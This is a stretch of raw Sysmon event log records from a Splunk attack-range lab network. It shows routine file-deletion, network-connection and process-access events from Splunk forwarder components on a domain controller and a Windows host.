AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53510-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000289170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:05.138{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EF4489F7644E25FCE709E1787F797A0,SHA256=1F695BAE0959B53B8691720A7448EA895DF3F3948933617728EDA90D4EAD1E9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:04.651{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51368-false10.0.1.12-8000- 23542300x8000000000000000217071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:06.160{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8D3328F0B1681B31DF3107A3562C2B8,SHA256=14A731B9B050098318CFD1D6FC3CE3F909AC2A37D5F7348420306EDE79D23CD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:06.153{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=883D50D1D9A61E1D0123D9E48CB9BDCA,SHA256=0A91B7798C7D8C0FA27EDEB310C668944C243A7B6C486C1652AC47C0B0784E11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:07.395{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0656B9F7BB6EC5027C2DCBA3B39EC6C,SHA256=72ACB7FDD9BDE4837994597AFC1F7D03AA1D49EF7331E2573B0EB9F59BCD4210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:07.168{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D12E102F2FF1236814F3A5F58E1C77,SHA256=175D5A3F9FFD13C78A01DA7FFD71E8BEBC063CECC2025489A6E4D1A0222E3C55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:08.566{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=702469B1293D194805125DDA3EEF76B1,SHA256=A013E5A8EC07C7BE8B8B19F0C8912569753343023C75280B64F5E4C181791423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:08.183{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8B66E57BA017349C4A21AFDF74F5662,SHA256=12E058985EE4F19675ED46DF984634A4705EC155FC93D78919C7CEF7EE00DB2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:09.582{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=179AB8B252480517025F0311BEF5322E,SHA256=D5E5A820D2917AC0D24755FC18095C38A5E88EA0A488E737ABC7BAD07072D282,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:06.588{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53511-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:09.184{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7278910401250D272D9793293EB4C36,SHA256=144F2ED73000F1278CA245E7BDB7B68A63AB4D1564E6AD9CA46FB17EFE304A37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:10.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F73F311F4B7F7C09E9CCAC89DBB38A,SHA256=E1A5586C15A5ABD395176D89BAED8207818E1485C8E474C22A965D7515613B64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:10.199{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C08E970923342DDF4DA6A0F4EFCF3020,SHA256=F1EFD6E86CD4B3F4D06C3977C843E1114D52F59F48C59CFA659161C090741AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:11.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10EB6125AD06550687A72045D394D9F5,SHA256=8644E65D5A004064CD92FC0B8EEEA0DA3E20B99A9332F393D6919A193070AF7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:11.199{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97172B733AABCDB3E5F48BB23352E146,SHA256=8467FB02ED794F529AC120725FB18C05B3BE8B908BF0285991F443573F705107,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:12.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A942FDEFF32EC3B3EB3E8B2271BB96E,SHA256=DEAC754383EAB22D0A3A32187CE779AF46E0B7AFA965609B1A322B89FB66746C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289180Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:12.214{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07D8D2FBC49F654C258F95D0533BD73A,SHA256=8CAE0703D695545CBD0E837F3FC390E27169C6736801D92203F35DD4C6A1DF26,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:09.682{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51369-false10.0.1.12-8000- 23542300x8000000000000000217080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:13.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D9DD5AFBC9D46D5757516DB47EAB18C,SHA256=6CC5CED27508753B95819EBBF327FA6411497553F172203666B46BB543F760B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289181Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:13.215{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C16C0D627E0EA37D7BD4FFE3F0E73F5,SHA256=0A7A51F8AE8C107FBC00DFBF9EEE59D60449B09F6F1B14D437261833C0CE7CA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:14.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8139176E455C1514E5C4622B067B433,SHA256=BA2CAACEFB24FD5CDB4E67A01F260874C61F2D0AD1716E7079145928525613E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:11.728{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53512-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289182Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:14.216{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F9DE6C16E71405962DD5B00BBA6B5CF,SHA256=A85496EBF49D88B2AD59D0FE9ECA6D464E030CFFC9DA51C5E749AC0FF85532E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:15.599{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8E64B61124BD8A7922747104FF19DE9,SHA256=3272F625763B1F33133230B6FB197876F8C448CF576B6379906BE34A70680099,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:15.235{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CB2DA0B444749ACA055D4107A6435B9,SHA256=6FD9FF1B28F16B66C6ACE5716FF0D5399B90A3423096C4D28668A740F1274C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:16.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED433AD0C0D2CCADFA1DED44BE264882,SHA256=08A67CBB4D74AE55AF71CB98E099DC4CE8F8F17979C3AA9F6641397BF75D73AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:16.243{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1759E62921B21BE2BC0D4A5BC1B4FA9,SHA256=45E72E3B70AA935C11D3A6981B70E365BA061ED19D3B1D05F6626DD7CCD5ADA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:17.835{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C48D794D158A52049006275455751E55,SHA256=B1EBD49EF09B32E992412283CDABBCEBC07CFD8EB91427C4A55919271E1A325D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:17.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4EBE3101910FCFD7B73B04F4D1267A8,SHA256=CAB77435CF36D7647792E5187E7A7A8490B030659571BF80DD3CC36AB2FB5E0D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:15.450{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51370-false10.0.1.12-8000- 23542300x8000000000000000217086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:18.898{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F29FFBA6FAA845F41F6909DA8C4623B,SHA256=8D5FF97A39ADB9BD0C192E7070A06E873B183AD1B02F0E4D205F41094F71CEF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:18.260{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3619DEBB533D155308B43908ED061E3,SHA256=382B171FEF514E7F2AE9BED5D8E6670CD193966581CAC7FD78F2C88E303A02D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:19.898{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B4A06DFD342B32ACB94A9EA214944EF,SHA256=3518821F1BD2972D07B5A4FCBE56D755DC5495071CCDC0AF2418BDB6EA0602EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289206Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.975{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-121F-6216-2F05-000000003802}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289205Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.975{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289204Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.975{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289203Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.975{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289202Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.975{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289201Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.975{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-121F-6216-2F05-000000003802}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289200Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.975{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-121F-6216-2F05-000000003802}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289199Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.977{C8EA50B7-121F-6216-2F05-000000003802}6920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289198Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:19.791{C8EA50B7-121F-6216-2E05-000000003802}68806872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000289197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:17.612{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53513-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000289196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 